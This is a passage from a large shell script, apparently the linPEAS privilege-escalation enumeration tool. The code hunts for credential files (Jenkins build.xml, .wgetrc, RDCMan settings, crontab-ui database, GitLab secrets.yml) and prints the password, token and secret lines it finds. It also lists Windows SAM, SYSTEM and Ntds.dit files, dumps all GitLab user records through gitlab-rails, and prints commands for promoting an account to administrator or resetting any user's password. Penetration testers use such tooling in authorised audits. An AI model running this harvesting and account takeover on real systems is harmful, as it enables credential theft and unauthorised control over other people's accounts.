  10827     if ! [ "`echo \"$PSTORAGE_JENKINS\" | grep -E \"jenkins$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*jenkins"; fi; fi; printf "%s" "$PSTORAGE_JENKINS" | grep -E "jenkins$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,jenkins$,${SED_RED},"; find "$f" -name "build.xml" | while read ff; do ls -ld "$ff" | sed -${E} "s,build.xml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "secret.*|password.*" | sed -${E} "s,secret.*|password.*,${SED_RED},g"; done; echo "";done; echo "";
  10828 fi
  10829 
  10830 
  10831 if [ "$PSTORAGE_WGET" ] || [ "$DEBUG" ]; then
  10832   print_2title "Analyzing Wget Files (limit 70)"
  10833     if ! [ "`echo \"$PSTORAGE_WGET\" | grep -E \"\.wgetrc$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".wgetrc"; fi; fi; printf "%s" "$PSTORAGE_WGET" | grep -E "\.wgetrc$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.wgetrc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,[pP][aA][sS][sS].*|[uU][sS][eE][rR].*,${SED_RED},g"; done; echo "";
  10834 fi
  10835 
  10836 
  10837 if [ "$PSTORAGE_INTERESTING_LOGS" ] || [ "$DEBUG" ]; then
  10838   print_2title "Analyzing Interesting logs Files (limit 70)"
  10839     if ! [ "`echo \"$PSTORAGE_INTERESTING_LOGS\" | grep -E \"access\.log$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "access.log"; fi; fi; printf "%s" "$PSTORAGE_INTERESTING_LOGS" | grep -E "access\.log$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,access\.log$,${SED_RED},"; done; echo "";
  10840     if ! [ "`echo \"$PSTORAGE_INTERESTING_LOGS\" | grep -E \"error\.log$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "error.log"; fi; fi; printf "%s" "$PSTORAGE_INTERESTING_LOGS" | grep -E "error\.log$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,error\.log$,${SED_RED},"; done; echo "";
  10841 fi
  10842 
  10843 
  10844 if [ "$PSTORAGE_OTHER_INTERESTING" ] || [ "$DEBUG" ]; then
  10845   print_2title "Analyzing Other Interesting Files (limit 70)"
  10846     if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING\" | grep -E \"\.bashrc$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".bashrc"; fi; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING" | grep -E "\.bashrc$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.bashrc$,${SED_RED},"; done; echo "";
  10847     if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING\" | grep -E \"\.google_authenticator$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".google_authenticator"; fi; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING" | grep -E "\.google_authenticator$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.google_authenticator$,${SED_RED},"; done; echo "";
  10848     if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING\" | grep -E \"hosts\.equiv$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "hosts.equiv"; fi; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING" | grep -E "hosts\.equiv$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,hosts\.equiv$,${SED_RED},"; done; echo "";
  10849     if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING\" | grep -E \"\.lesshst$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".lesshst"; fi; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING" | grep -E "\.lesshst$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.lesshst$,${SED_RED},"; done; echo "";
  10850     if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING\" | grep -E \"\.plan$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".plan"; fi; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING" | grep -E "\.plan$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.plan$,${SED_RED},"; done; echo "";
  10851     if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING\" | grep -E \"\.profile$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".profile"; fi; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING" | grep -E "\.profile$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.profile$,${SED_RED},"; done; echo "";
  10852     if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING\" | grep -E \"\.recently-used\.xbel$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".recently-used.xbel"; fi; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING" | grep -E "\.recently-used\.xbel$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.recently-used\.xbel$,${SED_RED},"; done; echo "";
  10853     if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING\" | grep -E \"\.rhosts$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".rhosts"; fi; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING" | grep -E "\.rhosts$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.rhosts$,${SED_RED},"; done; echo "";
  10854     if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING\" | grep -E \"\.sudo_as_admin_successful$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".sudo_as_admin_successful"; fi; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING" | grep -E "\.sudo_as_admin_successful$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.sudo_as_admin_successful$,${SED_RED},"; done; echo "";
  10855 fi
  10856 
  10857 
  10858 if [ "$PSTORAGE_WINDOWS" ] || [ "$DEBUG" ]; then
  10859   print_2title "Analyzing Windows Files (limit 70)"
  10860     if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"\.rdg$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.rdg"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "\.rdg$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.rdg$,${SED_RED},"; done; echo "";
  10861     if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"AppEvent\.Evt$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "AppEvent.Evt"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "AppEvent\.Evt$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,AppEvent\.Evt$,${SED_RED},"; done; echo "";
  10862     if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"autounattend\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "autounattend.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "autounattend\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,autounattend\.xml$,${SED_RED},"; done; echo "";
  10863     if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"ConsoleHost_history\.txt$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ConsoleHost_history.txt"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "ConsoleHost_history\.txt$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,ConsoleHost_history\.txt$,${SED_RED},"; done; echo "";
  10864     if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"FreeSSHDservice\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "FreeSSHDservice.ini"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "FreeSSHDservice\.ini$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,FreeSSHDservice\.ini$,${SED_RED},"; done; echo "";
  10865     if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"NetSetup\.log$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "NetSetup.log"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "NetSetup\.log$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,NetSetup\.log$,${SED_RED},"; done; echo "";
  10866     if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"Ntds\.dit$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "Ntds.dit"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "Ntds\.dit$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,Ntds\.dit$,${SED_RED},"; done; echo "";
  10867     if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"protecteduserkey\.bin$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "protecteduserkey.bin"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "protecteduserkey\.bin$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,protecteduserkey\.bin$,${SED_RED},"; done; echo "";
  10868     if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"RDCMan\.settings$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "RDCMan.settings"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "RDCMan\.settings$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,RDCMan\.settings$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,credentialsProfiles|password|encryptedPassword,${SED_RED},g"; done; echo "";
  10869     if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"SAM$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "SAM"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "SAM$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,SAM$,${SED_RED},"; done; echo "";
  10870     if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"SYSTEM$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "SYSTEM"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "SYSTEM$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,SYSTEM$,${SED_RED},"; done; echo "";
  10871     if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"SecEvent\.Evt$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "SecEvent.Evt"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "SecEvent\.Evt$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,SecEvent\.Evt$,${SED_RED},"; done; echo "";
  10872     if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"appcmd\.exe$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "appcmd.exe"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "appcmd\.exe$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,appcmd\.exe$,${SED_RED},"; done; echo "";
  10873     if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"bash\.exe$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "bash.exe"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "bash\.exe$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,bash\.exe$,${SED_RED},"; done; echo "";
  10874     if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"datasources\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "datasources.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "datasources\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,datasources\.xml$,${SED_RED},"; done; echo "";
  10875     if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"default\.sav$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "default.sav"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "default\.sav$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,default\.sav$,${SED_RED},"; done; echo "";
  10876     if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"drives\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "drives.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "drives\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,drives\.xml$,${SED_RED},"; done; echo "";
  10877     if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"groups\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "groups.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "groups\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,groups\.xml$,${SED_RED},"; done; echo "";
  10878     if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"https-xampp\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "https-xampp.conf"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "https-xampp\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,https-xampp\.conf$,${SED_RED},"; done; echo "";
  10879     if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"https\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "https.conf"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "https\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,https\.conf$,${SED_RED},"; done; echo "";
  10880     if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"iis6\.log$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "iis6.log"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "iis6\.log$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,iis6\.log$,${SED_RED},"; done; echo "";
  10881     if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"index\.dat$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "index.dat"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "index\.dat$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,index\.dat$,${SED_RED},"; done; echo "";
  10882     if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"my\.cnf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "my.cnf"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "my\.cnf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,my\.cnf$,${SED_RED},"; done; echo "";
  10883     if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"my\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "my.ini"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "my\.ini$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,my\.ini$,${SED_RED},"; done; echo "";
  10884     if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"ntuser\.dat$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ntuser.dat"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "ntuser\.dat$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,ntuser\.dat$,${SED_RED},"; done; echo "";
  10885     if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"pagefile\.sys$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "pagefile.sys"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "pagefile\.sys$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,pagefile\.sys$,${SED_RED},"; done; echo "";
  10886     if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"printers\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "printers.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "printers\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,printers\.xml$,${SED_RED},"; done; echo "";
  10887     if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"recentservers\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "recentservers.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "recentservers\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,recentservers\.xml$,${SED_RED},"; done; echo "";
  10888     if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"scclient\.exe$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "scclient.exe"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "scclient\.exe$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,scclient\.exe$,${SED_RED},"; done; echo "";
  10889     if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"scheduledtasks\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "scheduledtasks.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "scheduledtasks\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,scheduledtasks\.xml$,${SED_RED},"; done; echo "";
  10890     if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"security\.sav$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "security.sav"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "security\.sav$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,security\.sav$,${SED_RED},"; done; echo "";
  10891     if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"server\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "server.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "server\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,server\.xml$,${SED_RED},"; done; echo "";
  10892     if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"setupinfo$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "setupinfo"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "setupinfo$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,setupinfo$,${SED_RED},"; done; echo "";
  10893     if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"setupinfo\.bak$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "setupinfo.bak"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "setupinfo\.bak$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,setupinfo\.bak$,${SED_RED},"; done; echo "";
  10894     if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"sitemanager\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sitemanager.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "sitemanager\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,sitemanager\.xml$,${SED_RED},"; done; echo "";
  10895     if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"sites\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sites.ini"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "sites\.ini$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,sites\.ini$,${SED_RED},"; done; echo "";
  10896     if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"software$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "software"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "software$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,software$,${SED_RED},"; done; echo "";
  10897     if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"software\.sav$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "software.sav"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "software\.sav$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,software\.sav$,${SED_RED},"; done; echo "";
  10898     if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"sysprep\.inf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sysprep.inf"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "sysprep\.inf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,sysprep\.inf$,${SED_RED},"; done; echo "";
  10899     if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"sysprep\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sysprep.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "sysprep\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,sysprep\.xml$,${SED_RED},"; done; echo "";
  10900     if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"system\.sav$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "system.sav"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "system\.sav$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,system\.sav$,${SED_RED},"; done; echo "";
  10901     if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"unattend\.inf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "unattend.inf"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "unattend\.inf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,unattend\.inf$,${SED_RED},"; done; echo "";
  10902     if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"unattend\.txt$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "unattend.txt"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "unattend\.txt$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,unattend\.txt$,${SED_RED},"; done; echo "";
  10903     if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"unattend\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "unattend.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "unattend\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,unattend\.xml$,${SED_RED},"; done; echo "";
  10904     if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"unattended\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "unattended.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "unattended\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,unattended\.xml$,${SED_RED},"; done; echo "";
  10905     if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"wcx_ftp\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "wcx_ftp.ini"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "wcx_ftp\.ini$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,wcx_ftp\.ini$,${SED_RED},"; done; echo "";
  10906     if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"ws_ftp\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ws_ftp.ini"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "ws_ftp\.ini$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,ws_ftp\.ini$,${SED_RED},"; done; echo "";
  10907     if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"web.*\.config$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "web*.config"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "web.*\.config$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,web.*\.config$,${SED_RED},"; done; echo "";
  10908     if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"winscp\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "winscp.ini"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "winscp\.ini$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,winscp\.ini$,${SED_RED},"; done; echo "";
  10909     if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"wsl\.exe$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "wsl.exe"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "wsl\.exe$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,wsl\.exe$,${SED_RED},"; done; echo "";
  10910     if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"plum\.sqlite$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "plum.sqlite"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "plum\.sqlite$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,plum\.sqlite$,${SED_RED},"; done; echo "";
  10911 fi
  10912 
  10913 
  10914 if [ "$PSTORAGE_CRONTAB_UI" ] || [ "$DEBUG" ]; then
  10915   print_2title "Analyzing Crontab-UI Files (limit 70)"
  10916     if ! [ "`echo \"$PSTORAGE_CRONTAB_UI\" | grep -E \"crontab\.db$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "crontab.db"; fi; fi; printf "%s" "$PSTORAGE_CRONTAB_UI" | grep -E "crontab\.db$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,crontab\.db$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "-P[[:space:]]+\S+|--password[[:space:]]+\S+|[Pp]ass(word)?|[Tt]oken|[Ss]ecret" | sed -${E} "s,-P[[:space:]]+\S+|--password[[:space:]]+\S+|[Pp]ass(word)?|[Tt]oken|[Ss]ecret,${SED_RED},g"; done; echo "";
  10917     if ! [ "`echo \"$PSTORAGE_CRONTAB_UI\" | grep -E \"crontab-ui\.service$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "crontab-ui.service"; fi; fi; printf "%s" "$PSTORAGE_CRONTAB_UI" | grep -E "crontab-ui\.service$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,crontab-ui\.service$,${SED_RED},"; done; echo "";
  10918 fi
  10919 
  10920 
  10921 
  10922 
  10923 fi
  10924 
  10925 if check_mitre_filter "T1552.001"; then
  10926 if [ "$PSTORAGE_FREEIPA" ] || [ "$DEBUG" ]; then
  10927   print_2title "Analyzing FreeIPA Files (limit 70)"
  10928     ipa_exists="$(command -v ipa)"; if [ "$ipa_exists" ]; then print_info "https://book.hacktricks.wiki/en/linux-hardening/freeipa-pentesting.html"; fi
  10929     if ! [ "`echo \"$PSTORAGE_FREEIPA\" | grep -E \"ipa$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ipa"; fi; fi; printf "%s" "$PSTORAGE_FREEIPA" | grep -E "ipa$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,ipa$,${SED_RED},"; find "$f" -name "default.conf" | while read ff; do ls -ld "$ff" | sed -${E} "s,default.conf,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$"; done; echo "";done; echo "";
  10930     if ! [ "`echo \"$PSTORAGE_FREEIPA\" | grep -E \"dirsrv$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "dirsrv"; fi; fi; printf "%s" "$PSTORAGE_FREEIPA" | grep -E "dirsrv$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,dirsrv$,${SED_RED},"; find "$f" -name "id2rntry.db" | while read ff; do ls -ld "$ff" | sed -${E} "s,id2rntry.db,${SED_RED},"; done; echo "";done; echo "";
  10931 fi
  10932 
  10933 
  10934 fi
  10935 
  10936 if check_mitre_filter "T1552.001"; then
  10937 if [ "$(command -v gitlab-rails || echo -n '')" ] || [ "$(command -v gitlab-backup || echo -n '')" ] || [ "$PSTORAGE_GITLAB" ] || [ "$DEBUG" ]; then
  10938   print_2title "Searching GitLab related files" "T1552.001"
  10939   #Check gitlab-rails
  10940   if [ "$(command -v gitlab-rails || echo -n '')" ]; then
  10941     echo "gitlab-rails was found. Trying to dump users..."
  10942     gitlab-rails runner 'User.where.not(username: "peasssssssss").each { |u| pp u.attributes }' | sed -${E} "s,email|password,${SED_RED},"
  10943     echo "If you have enough privileges, you can make an account under your control administrator by running: gitlab-rails runner 'user = User.find_by(email: \"youruser@example.com\"); user.admin = TRUE; user.save!'"
  10944     echo "Alternatively, you could change the password of any user by running: gitlab-rails runner 'user = User.find_by(email: \"admin@example.com\"); user.password = \"pass_peass_pass\"; user.password_confirmation = \"pass_peass_pass\"; user.save!'"
  10945     echo ""
  10946   fi
  10947   if [ "$(command -v gitlab-backup || echo -n '')" ]; then
  10948     echo "If you have enough privileges, you can create a backup of all the repositories inside gitlab using 'gitlab-backup create'"
  10949     echo "Then you can get the plain-text with something like 'git clone \@hashed/19/23/14348274[...]38749234.bundle'"
  10950     echo ""
  10951   fi
  10952   #Check gitlab files
  10953   printf "%s\n" "$PSTORAGE_GITLAB" | sort | uniq | while read f; do
  10954     if echo $f | grep -q secrets.yml; then
  10955       echo "Found $f" | sed "s,$f,${SED_RED},"
  10956       cat "$f" 2>/dev/null | grep -Iv "^$" | grep -v "^#"
  10957     elif echo $f | grep -q gitlab.yml; then
  10958       echo "Found $f" | sed "s,$f,${SED_RED},"
  10959       cat "" | grep -A 4 "repositories:"
